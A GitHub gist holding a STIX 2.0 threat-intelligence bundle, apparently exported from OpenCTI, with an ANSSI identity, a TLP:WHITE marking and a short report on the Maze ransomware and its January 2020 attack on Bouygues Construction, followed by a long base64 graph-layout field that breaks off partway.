Skip to content

Instantly share code, notes, and snippets.

@truatpasteurdotfr

truatpasteurdotfr/gist:32b6fcb08cf9b0c3b8df67af258a280d

Created February 7, 2020 09:01
Show Gist options
  • Save truatpasteurdotfr/32b6fcb08cf9b0c3b8df67af258a280d to your computer and use it in GitHub Desktop.
Save truatpasteurdotfr/32b6fcb08cf9b0c3b8df67af258a280d to your computer and use it in GitHub Desktop.
Download ZIP
Raw
gistfile1.txt
{
"type": "bundle",
"id": "bundle--1e92024b-eb00-4a78-bcf2-b31d67c08a89",
"spec_version": "2.0",
"objects": [
{
"id": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"type": "identity",
"name": "ANSSI",
"identity_class": "organization",
"labels": [
"identity"
],
"created": "2019-04-26T11:54:44.000Z",
"modified": "2019-04-26T11:54:44.000Z",
"x_opencti_organization_class": "csirt",
"x_opencti_identity_type": "organization",
"x_opencti_id": "09baf6bd-ae68-38cd-96b7-05f3a6e4a60e"
},
{
"id": "marking-definition--f814dace-5888-4848-ab23-326518531d3e",
"type": "marking-definition",
"definition_type": "TLP",
"definition": {
"TLP": "TLP:WHITE"
},
"created": "2019-04-15T16:50:04.000Z",
"x_opencti_modified": "2019-04-15T16:50:04.000Z",
"x_opencti_id": "29d02f65-ba2f-3da9-9878-52950ef5a617"
},
{
"id": "report--24854f15-ab94-4adc-81d0-f08a420167c2",
"type": "report",
"name": "Maze report",
"labels": [
"report"
],
"description": "Maze ransomware has been discovered in May 2019. it is known to be associated with data leaks in Internet. By this mean, some of the Threat Actors using Maze have chosen to put more pressure on victims. Leaked datas are uploaded on the website mazenews.top. In France, a part of Bouygues Construction company's networks has been compromised by Maze in january 2020. Threat Actor claimed to have ask for 10 millions dollars of ransom.",
"published": "2020-02-04T00:00:00.000Z",
"created": "2020-02-04T14:16:03.574Z",
"modified": "2020-02-05T10:32:21.843Z",
"x_opencti_report_class": "Threat Report",
"x_opencti_object_status": 2,
"x_opencti_source_confidence_level": 3,
"x_opencti_graph_data": "eyJub2RlcyI6eyIxNGRiMzgxNi01M2RiLTQ4MTEtYmE2ZS01ODY0MjZhZTU5YjgiOnsicG9zaXRpb24iOnsieCI6MjE1MCwieSI6MTg1fX0sIjZmYjg0ZjAyLWYwOTUtNDMwZS04N2EwLTM5NGQ0MTk1NWVlZSI6eyJwb3NpdGlvbiI6eyJ4Ijo4MTUsInkiOjE4NX19LCI5NDdhZjUzNS02NGUyLTRjMGQtOGI2MC05ODBkMjYzM2MwMTQiOnsicG9zaXRpb24iOnsieCI6MTA1NSwieSI6MTg1fX0sIjg2N2QwM2Y0LWJlNzMtNDRmNi04MmQ5LTdkN2IxNGRmNTVkNyI6eyJwb3NpdGlvbiI6eyJ4IjoyMjUwLCJ5IjowfX0sIjgzNTg1OWIxLTBiYjktNGVjNS1iN2Q3LWMzN2YyODc0N2EwYiI6eyJwb3NpdGlvbiI6eyJ4IjoxNDg1LCJ5IjowfX0sImIyNjhlNGYwLWU4MjAtNDljNy1iNDQxLTAxNWM1NDNkYjI1MiI6eyJwb3NpdGlvbiI6eyJ4Ijo2MzYyLjUsInkiOjM3MH19LCJmZjQ0YmEzZS0yNDA5LTQyYjktYjUyMy0yNGE3MGUxMTc2YWUiOnsicG9zaXRpb24iOnsieCI6Mzg1Ny41LCJ5IjozNzB9fSwiMDljMGYxN2QtNDI3Ni00YTI0LTliMzItYWNmNzc3YmE2YWY0Ijp7InBvc2l0aW9uIjp7IngiOjM2MTcuNSwieSI6MzcwfX0sImIwYWM0MWZhLWVmOTctNDYyZS1hOTBhLTc0ZTk3YjhiZTM2YiI6eyJwb3NpdGlvbiI6eyJ4IjozNTAsInkiOjB9fSwiYjU3ZTVjMGQtMGIzZS00MWQ5LTgxNTUtYjA0NTczNmY0N2Y0Ijp7InBvc2l0aW9uIjp7IngiOjYyNSwieSI6MzcwfX0sImRkODQzNjY1LTM3NGEtNGYyYy1hMmZjLTcwZjg1MGEyZmM5NSI6eyJwb3NpdGlvbiI6eyJ4IjozMzU3LjUsInkiOjM3MH19LCJmYWI3OGQyYi0zNzU5LTRjMTItOTQwYi03ODE0YWE3OGFlYzciOnsicG9zaXRpb24iOnsieCI6Mjg5Mi41LCJ5IjozNzB9fSwiZjlhYmVjM2UtMDUzMS00YmU0LWE5MWUtZjJmZjZmZDljMjZiIjp7InBvc2l0aW9uIjp7IngiOjQ0NDIuNSwieSI6MzcwfX0sImE3MDgzOWM1LWU2OGItNGQwMy1iZDUxLTkxNmU0MmFjOWU3OSI6eyJwb3NpdGlvbiI6eyJ4Ijo0NTkyLjUsInkiOjB9fSwiOGM5YWU4NGUtNmY2YS00NDE0LWFjYTAtNzE1OTI2MGUzNTlmIjp7InBvc2l0aW9uIjp7IngiOjQ4MDIuNSwieSI6MzcwfX0sIjcyNWFmMDllLTcxNGEtNDVhOC04YzM4LTlhZWM2M2I3YzNmMyI6eyJwb3NpdGlvbiI6eyJ4Ijo0MjYyLjUsInkiOjM3MH19LCJhMGFiMjk1ZS03ZGE5LTRlYjEtOGI3Ny0xMGE5NTY4OTUwMzgiOnsicG9zaXRpb24iOnsieCI6OTM1LCJ5IjowfX0sImQ0M2ExMDk5LTI2YmYtNGZhMC1hYzM2LTNhMjIyNzFjNDI4NCI6eyJwb3NpdGlvbiI6eyJ4Ijo3NjQyLjUsInkiOjM3MH19LCI5NWVjZDVmZS1kM2JjLTRmOGQtOTBjOS1kZGMwNzdhYjM4YzYiOnsicG9zaXRpb24iOnsieCI6NzM1Ny41LCJ5IjozNzB9fSwiODgyZWVjZTAtMGEyZC00MzA4LWFmMjctM2I1MGRjNzk0MTMxIjp7InBvc2l0aW9uIjp7IngiOjQ5ODIuNSwieSI6MzcwfX0sIjVjNzFmZDUwLTM5ODktNGEyYi04YzJiLWEyNTUxNWFkYmZhMyI6eyJwb3NpdGlvbiI6eyJ4Ijo3NDUyLjUsInkiOjB9fSwiOWYzMmJiMmUtMGY3NS00N2Q5LTg4ZDQtMTkyM2U1MzhiOWU0Ijp7InBvc2l0aW9uIjp7IngiOjkyNTIuNSwieSI6MH19LCJmMmY0NjU2Ny01ZDExLTRhZjQtODUxZi04MWFhMmEwZjkwNzMiOnsicG9zaXRpb24iOnsieCI6OTAxMi41LCJ5IjowfX0sImQyM2M3YzE2LTcwZDQtNDBlNi1hNjUyLTlkZjI3NDAwNzEzMSI6eyJwb3NpdGlvbiI6eyJ4Ijo4ODkyLjUsInkiOjB9fSwiZTA0ODhkMWQtYTg3Mi00YTgyLTlmMTQtZDQwOGVjNDY4Nzc0Ijp7InBvc2l0aW9uIjp7IngiOjczMzIuNSwieSI6MH19LCJmNjY5Y2NkMi1kNWY4LTQ1NDQtYThhMy1iMDk4NDVlNzM3NjgiOnsicG9zaXRpb24iOnsieCI6OTg1Mi41LCJ5IjowfX0sImVhMGJkNWU2LTBkZDMtNDU4Mi1hYjZiLTgxYmY2OTkyM2JkMyI6eyJwb3NpdGlvbiI6eyJ4Ijo4NjUyLjUsInkiOjB9fSwiNDAxM2EzYzQtMmY0MS00ODc5LWE4ODktYWRmYTIyMjYyOTRiIjp7InBvc2l0aW9uIjp7IngiOjk3MzIuNSwieSI6MH19LCJjMDJiNWFmMy02Y2Q0LTQ5MjAtODkyZS1kOTIxN2U3YWQ0MzIiOnsicG9zaXRpb24iOnsieCI6NzkzMi41LCJ5IjowfX0sIjE0YjIzZDJhLTFjZjktNDIyMC04MGFjLTBhMGVhYzg3ZDJhYyI6eyJwb3NpdGlvbiI6eyJ4Ijo5NjEyLjUsInkiOjB9fSwiZWZmMjVhODktZTMxZC00ZTdlLWIzZTItNDMzM2EyOTI4MzA1Ijp7InBvc2l0aW9uIjp7IngiOjg1MzIuNSwieSI6MH19LCI1OTVhOWU5Yy1hZDgwLTRmNzgtYjQ0MS1mMzQ1ODVhYTk0NjQiOnsicG9zaXRpb24iOnsieCI6OTQ5Mi41LCJ5IjowfX0sIjQwZGM1YjRiLTE1MzAtNGQ3OS1hN2I1LTBhN2I2NzA0ODdlMyI6eyJwb3NpdGlvbiI6eyJ4Ijo4NDEyLjUsInkiOjB9fSwiMDE3Y2NmZDItMGM0NS00NTQ1LWI4YzUtMjk3YTU3MmE2NDc3Ijp7InBvc2l0aW9uIjp7IngiOjUxMDIuNSwieSI6MzcwfX0sImIwMGQ0NzZlLTA0ZDMtNDQzMy05ZTg1LWIxMzk2YzI1ZmM2NCI6eyJwb3NpdGlvbiI6eyJ4Ijo1MjIyLjUsInkiOjM3MH19LCIwMjdlNWYwYy1iY2I1LTQzZjMtYTg3Ny1mNDViM2NiNzhjYWYiOnsicG9zaXRpb24iOnsieCI6NTM0Mi41LCJ5IjozNzB9fSwiZmEwNzY2ZTctNzE4YS00NTliLWJiZmQtNzQ0OTRhYmFkMGNjIjp7InBvc2l0aW9uIjp7IngiOjU0NjIuNSwieSI6MzcwfX0sImNhMmU1MTM5LTIyMTktNDFlZi05OGQwLWM4MTA2YWI2ZTBiZSI6eyJwb3NpdGlvbiI6eyJ4Ijo1NTgyLjUsInkiOjM3MH19LCJhNWJmZjU0MC0wZmNkLTRjMTYtOThkYi1hYjI1NzQ5MGY0OGMiOnsicG9zaXRpb24iOnsieCI6NTcwMi41LCJ5IjozNzB9fSwiMjRiOGMwMTgtNjJkNi00NDhhLWE5MGMtMjJkNTEyMzhkODZlIjp7InBvc2l0aW9uIjp7IngiOjU4MjIuNSwieSI6MzcwfX0sImQ5MmE3NjhiLTQ4OWQtNGVmYS1iNmY1LWUwZDUxYjVlZDRiMiI6eyJwb3NpdGlvbiI6eyJ4Ijo1OTQyLjUsInkiOjM3MH19LCJmOWEzYzdkYi1kYTdjLTQ5ZWItOTIwOC03ZTgzY2FhYmI1ZWUiOnsicG9zaXRpb24iOnsieCI6NjA2Mi41LCJ5IjozNzB9fSwiNTI5ZThmYzktMzZmYy00NmEwLTgxMTItYzdjNWIxNWQ2NTU4Ijp7InBvc2l0aW9uIjp7IngiOjYxODIuNSwieSI6MzcwfX0sImFkMzBjMDgyLTQ2NmItNDEyMS1iMTc1LTliOTA1MTY3OTdhMiI6eyJwb3NpdGlvbiI6eyJ4Ijo1MjgyLjUsInkiOjU1NX19LCI4ZTAyMWNmZi1hZWU5LTQ4Y2YtYjc0My1kYWIyNDg1M2Q1NDUiOnsicG9zaXRpb24iOnsieCI6NzIxMi41LCJ5IjowfX0sIjQ1ZDkyZjcyLWE0YTEtNDNjMC04OGZmLTgwMmMwZTQ0YTJmYSI6eyJwb3NpdGlvbiI6eyJ4Ijo4MjkyLjUsInkiOjB9fSwiOTNlOWY5ZmMtYjE5ZC00NmI1LWExNzctYTE1NGFkZmNjNjI2Ijp7InBvc2l0aW9uIjp7IngiOjcwOTIuNSwieSI6MH19LCIzYTJjOWU5NC0xZGU4LTRhYmItYWI1Yy01ZTBiN2Q0MzYxMWQiOnsicG9zaXRpb24iOnsieCI6NzgxMi41LCJ5IjowfX0sIjA2OWE3NjA3LTE3OGItNDgyNC1iOTY4LTRiYjk2Y2ZkZjg5YSI6eyJwb3NpdGlvbiI6eyJ4Ijo4MTcyLjUsInkiOjB9fSwiM2FhOTZkYTYtYTViOC00NzA2LWE2NjgtMjdhZDg1YjM1OTcwIjp7InBvc2l0aW9uIjp7IngiOjc2OTIuNSwieSI6MH19LCJjOTgzMTM5MC00Njc1LTQxOTctYTYwYi04N2IzNmZiMDQ3YWEiOnsicG9zaXRpb24iOnsieCI6ODc3Mi41LCJ5IjowfX0sImIzZWU0OTMyLWNkNjYtNGFkOC05NTZlLTNhNmYzZDg4ZWFlZSI6eyJwb3NpdGlvbiI6eyJ4Ijo2OTcyLjUsInkiOjB9fSwiYjE2MTRmOTMtYTAyMy00ZTUzLTg5YTctZTZmYjViYmNmNWZlIjp7InBvc2l0aW9uIjp7IngiOjY4NTIuNSwieSI6MH19LCJiOWM0MmEyOC0zNTRhLTQ4MjMtYWMwOS1kNzhmNTdmOTZhZDMiOnsicG9zaXRpb24iOnsieCI6ODA1Mi41LCJ5IjowfX0sImIwMjQ5MzUwLTVmNjgtNDY1MC1iMjI2LWY1NTA4ZmNiMjcwZCI6eyJwb3NpdGlvbiI6eyJ4Ijo5MTMyLjUsInkiOjB9fSwiYzcyNTI1OTMtNzllMS00NjVhLWEzOTgtY2RlMWI4ZDE5MmEwIjp7InBvc2l0aW9uIjp7IngiOjc1NzIuNSwieSI6MH19LCIyMDQ0MjAxMy0wMmE5LTQyZWUtOGI1Yy1mMDMxNTAzZWQ5MzYiOnsicG9zaXRpb24iOnsieCI6OTM3Mi41LCJ5IjowfX0sIjk5NTk4Nzc2LTBiODQtNDMzYi04MTI4LTM0NzQ5OTliNDk1NSI6eyJwb3NpdGlvbiI6eyJ4Ijo2NzMyLjUsInkiOjB9fSwiY2RmOGM0NWEtZWU1ZC0zMjViLWIxYTUtYjEyODk5MzU5ZTk3Ijp7InBvc2l0aW9uIjp7IngiOjEyMzIuNSwieSI6MTg1fX0sImQ4M2E0MjMxLTIzMTQtMzE1ZC1hYmM0LTZjNjU3NDI1N2RiZiI6eyJwb3NpdGlvbiI6eyJ4IjoyMzg1LCJ5IjoxODV9fSwiNmFiMmFhZTgtZGJjYy0zZjRkLTlkODAtYTRiM2ZiN2U2OGU0Ijp7InBvc2l0aW9uIjp7IngiOjE5OTIuNSwieSI6MTg1fX0sIjM0ZTlkMzFhLTYwZDUtMzJkYS04OWFiLWJiN2I4NzY3ODlhYiI6eyJwb3NpdGlvbiI6eyJ4IjoxNzMyLjUsInkiOjE4NX19LCI3ODBiYTU0OS02ZmQyLTRhMTUtOGRiMC1lZGIwNTA3ZmY4NzIiOnsicG9zaXRpb24iOnsieCI6ODU1Mi41LCJ5Ijo3NDB9fSwiZTdjMGZiNmMtZGMyMy00YTFlLWJhNjUtNzNiMzliOGVkMzcwIjp7InBvc2l0aW9uIjp7IngiOjYxNTIuNSwieSI6NzQwfX0sIjU3NzRiODczLTYwZDgtMzYyOC05YTRiLTk0MTVlNTIxMDFkNCI6eyJwb3NpdGlvbiI6eyJ4Ijo4OTAyLjUsInkiOjc0MH19LCI3ZDAwZTFhMy1hNzMxLTQzZDgtYTM5Yi05NzIzODE0NjczODAiOnsicG9zaXRpb24iOnsieCI6ODUxMi41LCJ5Ijo1NTV9fSwiZTI3NTMzMTItMTA5MC00OTJkLWE4ZmQtNTZjYTM2Njc1ZDM1Ijp7InBvc2l0aW9uIjp7IngiOjMzNTIuNSwieSI6NTU1fX0sIjljYTJmZjQzLWI3NjUtNGYxMy1hMjEzLTEwNjY0YTJhZThmYyI6eyJwb3NpdGlvbiI6eyJ4Ijo3NjM3LjUsInkiOjU1NX19LCI1ZDQyMjU1Yi0zMmEwLTQ4YmItOTk5Ni02NzAwZWRiNDk1NzQiOnsicG9zaXRpb24iOnsieCI6ODc5Ny41LCJ5Ijo1NTV9fSwiYmUxZDc3NDUtYmQ3My00NzYzLTkzY2MtMzQ5MjgwMzZjYWEzIjp7InBvc2l0aW9uIjp7IngiOjMxMTIuNSwieSI6NTU1fX0sImI2MmM4NDZiLTY2OWQtNDIyMi04OWMyLTc5NzIyZmE2NTU4NyI6eyJwb3NpdGlvbiI6eyJ4IjozMTUsInkiOjc0MH19LCJkYWIwMzM2OS1mNjczLTRmYzEtYWQ0OC0xNTlhZTVlYmZhNmUiOnsicG9zaXRpb24iOnsieCI6MjU1LCJ5Ijo1NTV9fSwiYThkZDYyOWUtOWJiYi00M2ZjLWE0MDktZGM2ZDZlOTZlMjIxIjp7InBvc2l0aW9uIjp7IngiOjI3MzIuNSwieSI6NTU1fX0sImNhYjBiOTRlLWI5NTctNGY2ZC1hNjQ4LTNkOTMyMzMwN2YwNCI6eyJwb3NpdGlvbiI6eyJ4IjoyMzg3LjUsInkiOjU1NX19LCI0NjQ0NDk1My01ZjMxLTQxYjYtOTgzOS1kYTYzMDgyMmM1OWIiOnsicG9zaXRpb24iOnsieCI6MjM4Ny41LCJ5Ijo3NDB9fSwiYmE3YTVmODMtOTlkMy00YzVhLWE3NDItNDFmMzY3NGZlMzQ2Ijp7InBvc2l0aW9uIjp7IngiOjM5MzcuNSwieSI6NTU1fX0sIjQzMzE2MWU4LTc0MDUtNGFjMC04MTJlLWUzOThjOTMwY2MyZSI6eyJwb3NpdGlvbiI6eyJ4Ijo0MTc3LjUsInkiOjU1NX19LCI4ZTc4ZDc4Yi05MDZjLTM1ZmQtYmVhOC1kZWUzYjY5ZGYyMmIiOnsicG9zaXRpb24iOnsieCI6NjI2Mi41LCJ5Ijo3NDB9fSwiMDg2NzBjMjMtNWJkYy00NWI1LTg4OWMtOWE4N2Y5NzZkZjZhIjp7InBvc2l0aW9uIjp7IngiOjM2OTcuNSwieSI6NTU1fX0sIjJhYzkwZDcwLTcyZWUtMzBhOS04YThkLTVmNWI0NGUxYmIwMCI6eyJwb3NpdGlvbiI6eyJ4Ijo4NjY3LjUsInkiOjc0MH19LCJkODE4YWJhNi0wNjQ2LTQ2NzgtOWI1Mi0xYWViZmI1MjgxZGEiOnsicG9zaXRpb24iOnsieCI6NjA0Mi41LCJ5Ijo3NDB9fSwiZDA1MjNmOTQtYjY5Yy0zMTE0LTg2NTUtOThjMzdiZGY1YTY3Ijp7InBvc2l0aW9uIjp7IngiOjU5MzIuNSwieSI6NzQwfX0sIjk2ZTUwMGU3LWFiZmEtMzg0Ny04ODc0LTU3YzQ5M2NiMjdjOSI6eyJwb3NpdGlvbiI6eyJ4IjoxOTUsInkiOjc0MH19LCI2YmVhZTQ0Yy0yYmU3LTMxNWMtODNmMi1jMGI0YjBiNGU0ZDYiOnsicG9zaXRpb24iOnsieCI6MzE2Mi41LCJ5Ijo3NDB9fSwiZGFmMWFmMzItNmFjNS00MmY4LWE5MmMtZmU2MjM4ZDc1OGQ0Ijp7InBvc2l0aW9uIjp7IngiOjI2MjIuNSwieSI6NzQwfX0sImU4YzIzOWVkLWEyNDgtNDkxNi05ZThmLTBiZTFmNDY3ODYzOSI6eyJwb3NpdGlvbiI6eyJ4IjoyODY3LjUsInkiOjc0MH19LCJjOGMzMmZhNS01NzZhLTMyOGQtYjhiMy1mYjZkOGE4ZDUzNTUiOnsicG9zaXRpb24iOnsieCI6NTgxNy41LCJ5Ijo3NDB9fSwiZTM2NjBlMzUtYTk3ZC0zODFkLThjZTktNjkyZjNhZDQ0ZjNlIjp7InBvc2l0aW9uIjp7IngiOjkwNzcuNSwieSI6NzQwfX0sIjA1OTg5YTIwLTY5MjUtNDY1Ny05NGE3LWJlYTVkOTQ1YWEyNSI6eyJwb3NpdGlvbiI6eyJ4Ijo4NjgyLjUsInkiOjM3MH19LCJhNjE1YmJjZi1iYjk3LTRkM2UtOGQ1Yi03NDhjZDc1MTlhY2QiOnsicG9zaXRpb24iOnsieCI6ODM4Ny41LCJ5IjoxODV9fSwiN2Y4OGUzOWEtYmMxYS00MWZhLWI3OGYtMjBiOTBmNDIzZjJhIjp7InBvc2l0aW9uIjp7IngiOjY2MDcuNSwieSI6MTEwfX0sImFjZTQ0NTI5LTc1NWItNGFiNi05YTdlLTg4NjIxMWIzNGY0YSI6eyJwb3NpdGlvbiI6eyJ4Ijo2NTM3LjUsInkiOjQ4MH19LCI3NzZjYjYzYi01ZTc3LTQxMWUtODZhZC03NDBlMTcyNWI2YmYiOnsicG9zaXRpb24iOnsieCI6NjM1Ny41LCJ5IjoyOTV9fSwiMjQ0MDE4ODUtZmVmMy00MjVhLWI2NWItNjg1NzU4OWNlMmU2Ijp7InBvc2l0aW9uIjp7IngiOjkwNzIuNSwieSI6NjY1fX0sImRmYjdjOTcyLTUwOWUtNGYzYi1hNWM1LTJkZmI5MDI4MTBkOSI6eyJwb3NpdGlvbiI6eyJ4IjozMTAsInkiOjY2NX19LCIxNTI0MmMyNS04OTA2LTQyMjMtOWIyOC1iNjBmZTY2YmQ2YWUiOnsicG9zaXRpb24iOnsieCI6NDc5Ny41LCJ5IjoyOTV9fSwiNmE5YjQ1N2MtZmU1Yi00YmJkLTg1MTItOWM0ZDhlMWFjNzhiIjp7InBvc2l0aW9uIjp7IngiOjU2OTcuNSwieSI6NDgwfX0sImU5M2IxNDlmLTg1MzItNDEwNC04MDhmLTQ1NGJmYzU4MzAxMSI6eyJwb3NpdGlvbiI6eyJ4Ijo2OTAsInkiOjExMH19LCI3ZTE0ZGY1Yy1jNzRkLTQwMWYtODNlOC1jMzllMjlmYjMxMTEiOnsicG9zaXRpb24iOnsieCI6MTA1MCwieSI6MTEwfX0sIjIyNDNiMTI4LTE0MWQtNDViMi04YzllLWU1YTE3NTU4YjY2YSI6eyJwb3NpdGlvbiI6eyJ4Ijo4MzgyLjUsInkiOjY2NX19LCJjOWJlYzU1Yi0yMGVhLTQwMDgtOTU2Ni0zN2M5ZWIyNzhiMGQiOnsicG9zaXRpb24iOnsieCI6MzM0Ny41LCJ5Ijo2NjV9fSwiMWNlNDk1YzMtZTU2NC00NDNlLWJiNjAtNzE5ODU4YWEwNWU5Ijp7InBvc2l0aW9uIjp7IngiOjMxMDcuNSwieSI6NjY1fX0sIjBmOTU2ZTRkLTY5NjctNDE1Ny05ZTMxLWM3NmU4YzczOGJmMiI6eyJwb3NpdGlvbiI6eyJ4Ijo2MjAsInkiOjI5NX19LCIxODVhNDc4NC05MzNjLTRkYmItOTQzMC00NDNiZjhiM2U0MWMiOnsicG9zaXRpb24iOnsieCI6MjM4Mi41LCJ5Ijo2NjV9fSwiNWNkMjVhM2ItODAxZi00ODgyLWEzODUtN2IwZTg2MmUzZGQwIjp7InBvc2l0aW9uIjp7IngiOjQ0MzcuNSwieSI6Mjk1fX0sIjlkMTljMzVlLTFhZWEtNGZjMC05YjVkLWYyMTEwZDMxM2E3YiI6eyJwb3NpdGlvbiI6eyJ4IjozNjkyLjUsInkiOjY2NX19LCIwYWUxOTAxOS01OTE4LTQ1ZmYtYmE0MS1lYjkwZTBkMWEwNDAiOnsicG9zaXRpb24iOnsieCI6OTg0Ny41LCJ5IjoxMTB9fSwiZjkxNzgwZDktMDM0My00YWZiLWE5NTgtOWQ0ZjMzZThiYTI0Ijp7InBvc2l0aW9uIjp7IngiOjk3MjcuNSwieSI6MTEwfX0sIjQ3ZDY1NWYwLTM3YTEtNGY4OC05NDIyLTE4MTVkMDNkY2VhNSI6eyJwb3NpdGlvbiI6eyJ4Ijo5NjA3LjUsInkiOjExMH19LCJlZDkyNWM1OS00YWE2LTQ3NGQtYmFkNC1hNzVhMjZmZjBkMzQiOnsicG9zaXRpb24iOnsieCI6OTQ4Ny41LCJ5IjoxMTB9fSwiOTZhZmUyOWEtYzM0Yy00N2U5LTk5NzEtMjVjNGM2OGU5MjJlIjp7InBvc2l0aW9uIjp7IngiOjkzNjcuNSwieSI6MTEwfX0sImZmYTEwZDhkLTUzN2ItNDBhYy1hODE1LTM4MzNhNjA4ODI3NyI6eyJwb3NpdGlvbiI6eyJ4IjoxNzkwLCJ5IjoxMTB9fSwiYmE0ZTc4ODEtNGY3Yy00NmNmLTk4OTgtNGIyZTkyZTg4ZGE4Ijp7InBvc2l0aW9uIjp7IngiOjI2MjcuNSwieSI6NDgwfX0sIjIzYjhhMTAzLTMyOGMtNDcwOS04Yjg5LWJjZDU3Njg1NDYzMSI6eyJwb3NpdGlvbiI6eyJ4Ijo1NTAsInkiOjExMH19LCJlYzc1NDY0OC1hYzRlLTRmOTUtOWI1MC0wOWI0MGQ5NDIxMWYiOnsicG9zaXRpb24iOnsieCI6ODY2Ny41LCJ5Ijo2NjV9fSwiMmNjMmJjZjgtZmZmZi00ZWU4LWFkMzEtZjYyNTg1YzNkMTIwIjp7InBvc2l0aW9uIjp7IngiOjg1MDIuNSwieSI6NjY1fX0sIjM5YWI1MzcwLTAxZGUtNDQzMC04NjhlLTdjOWFlM2ZlYWZiZCI6eyJwb3NpdGlvbiI6eyJ4Ijo3NjI3LjUsInkiOjY2NX19LCJlNjQ0MTEwYy00OTg3LTRkMDItYmU0Mi03YTliYWYyNjE1MWEiOnsicG9zaXRpb24iOnsieCI6Mzg1Mi41LCJ5IjoyOTV9fSwiOTg1YzZhYmQtNWZjNy00MDhjLTgzNGQtYWRmZDBkY2JlN2NiIjp7InBvc2l0aW9uIjp7IngiOjM5MTIuNSwieSI6NDgwfX0sIjgzOGJjMzRhLTQzNzItNGFlZS04YzNkLWExY2IxNWUzZTY1MSI6eyJwb3NpdGlvbiI6eyJ4IjozOTMyLjUsInkiOjY2NX19LCIxYmJhMmZhOS0xN2QwLTRhNzctYTAxMC1lY2ZlZjYwZTQ5OTAiOnsicG9zaXRpb24iOnsieCI6OTI0Ny41LCJ5IjoxMTB9fSwiN2E1MmYyYzEtNWU5Yi00M2M0LWFjYzktMDQ1YmQ5NTc2ZmU3Ijp7InBvc2l0aW9uIjp7IngiOjU4MTcuNSwieSI6NDgwfX0sIjQxNDJjODg3LTBmMzktNDUyMS04OTcxLWM1MzczZGVhZGE2YSI6eyJwb3NpdGlvbiI6eyJ4Ijo5MTI3LjUsInkiOjExMH19LCJjOTdjOWM4My1lNWRjLTQ3ZjgtYTNlYy0zYzI4Nzk5N2ZiMWEiOnsicG9zaXRpb24iOnsieCI6MTY3MCwieSI6MTEwfX0sImY1MDlkMjI1LWY4MmItNGRjZS05ZDI5LTllYzZjN2JkOWY4NyI6eyJwb3NpdGlvbiI6eyJ4Ijo4Njc3LjUsInkiOjI5NX19LCI0NjIyZmJhYi0yNzIxLTQxMTgtOTJkMC1jMDVjNmVkNTI3ODYiOnsicG9zaXRpb24iOnsieCI6NzUwNy41LCJ5Ijo2NjV9fSwiOGVhMGMwNWYtZGMyMC00ZDA4LTk1MDYtZmZkNDExNzYxYzZlIjp7InBvc2l0aW9uIjp7IngiOjY0MTcuNSwieSI6NDgwfX0sImMxNzFiZTNlLWRkNzgtNDAxMi1hYzA5LWJjMjFmMWE0NDBlYiI6eyJwb3NpdGlvbiI6eyJ4Ijo4NzkyLjUsInkiOjY2NX19LCI4ZDI3Y2VhNS1hNjU2LTQ0OWUtOTFhOS1iMmQxZjRiZDFmYzUiOnsicG9zaXRpb24iOnsieCI6MzY3Mi41LCJ5Ijo0ODB9fSwiYzdjZmZiNDEtNTk1My00ZDI5LTkwMDctNWViMjBjZWFmMTQ3Ijp7InBvc2l0aW9uIjp7IngiOjI5NDcuNSwieSI6NDgwfX0sIjc2ZGYyYTY4LWEzZGEtNDBlNS1hMDNjLTQ5NjI4NGVkNzIyZiI6eyJwb3NpdGlvbiI6eyJ4Ijo0MjU3LjUsInkiOjQ4MH19LCIyMTg0YWE2OS05YmIxLTQxMWItYWM4YS05OTdmY2JiN2ExYmIiOnsicG9zaXRpb24iOnsieCI6OTAwNy41LCJ5IjoxMTB9fSwiMzQwOTRlYjQtYWE5MS00N2FkLTg0MDgtZTY4Y2IzYzdiNmQ1Ijp7InBvc2l0aW9uIjp7IngiOjg4ODcuNSwieSI6MTEwfX0sIjY4YjA5ZDI2LTJhY2ItNDRkNC05ZjQ2LTYwNmEyMTI2ZThiNSI6eyJwb3NpdGlvbiI6eyJ4Ijo4NzY3LjUsInkiOjExMH19LCIzMmNjMWI3NS1jMDZjLTQ0OTYtODkzNi1mNWVhYjhhYmRjM2MiOnsicG9zaXRpb24iOnsieCI6MjU1Ny41LCJ5IjoxMTB9fSwiYWQ0ZmRmMDktOGFjMy00NWU5LWJjOGEtZjI0ODcwNTY3NTU1Ijp7InBvc2l0aW9uIjp7IngiOjE1NTAsInkiOjExMH19LCI4NzU3YzU1My02MDRhLTQzYWItOGE0Yi0xYzg3YWY3Y2NiZTQiOnsicG9zaXRpb24iOnsieCI6MTQzMCwieSI6MTEwfX0sIjhjMTM1ZThiLTk5YWQtNGQyMC1iMmZkLTAxODM4MzI3NWQ2MyI6eyJwb3NpdGlvbiI6eyJ4IjoyMzkwLCJ5IjoxMTB9fSwiYjhmZDVjNzQtYWNlYS00YmEyLThjMzEtZDAzMzk2MTlhOTRkIjp7InBvc2l0aW9uIjp7IngiOjM2MTIuNSwieSI6Mjk1fX0sIjBhMDdmNjdjLTBiMGUtNGFmYi04Y2Y3LWQ3N2Q3YTZlYjJhNCI6eyJwb3NpdGlvbiI6eyJ4IjozNzkyLjUsInkiOjQ4MH19LCI4MDQwZjM0Ni0wOGU5LTRhMzctODQ0Ny01OWY3MjkwZmY2NmEiOnsicG9zaXRpb24iOnsieCI6OTMwLCJ5IjoxMTB9fSwiYTZjODI1MTYtMDM0NS00MzM0LWIxODAtMTc5OGEwODczNjQ2Ijp7InBvc2l0aW9uIjp7IngiOjQ5NzcuNSwieSI6NDgwfX0sImJhMzczMmM1LWM2NTItNDc3OS04OGQ5LTZlYzRhMDU3ODIwOSI6eyJwb3NpdGlvbiI6eyJ4Ijo4NjA3LjUsInkiOjQ4MH19LCJhNzljNTZiZi1jYmUxLTQ2YmMtODQ3My03ZTlhNWEyNGVmODYiOnsicG9zaXRpb24iOnsieCI6ODY0Ny41LCJ5IjoxMTB9fSwiN2QyYjJkN2QtOTE5MC00Y2MwLWI4MTctY2UzNjRlOWE5MDI5Ijp7InBvc2l0aW9uIjp7IngiOjg1MjcuNSwieSI6MTEwfX0sIjExNjU2NjBmLTE4OTgtNDRhMC04NGJlLTk3Y2E2Y2U4YzM1YyI6eyJwb3NpdGlvbiI6eyJ4Ijo4NDA3LjUsInkiOjExMH19LCI1Yjk4OWQyMS00MDVkLTQxOGEtYmY4Yy0yMDlmNDA3OWVmNzIiOnsicG9zaXRpb24iOnsieCI6NTIxNy41LCJ5Ijo0ODB9fSwiZWJkZWZkYTAtNTZmYi00MzNiLWJmZWEtNjQzNjViYjVjNmYxIjp7InBvc2l0aW9uIjp7IngiOjU1NzcuNSwieSI6NDgwfX0sIjQwODIzMmFkLWYyYjItNGEzZS05OTkw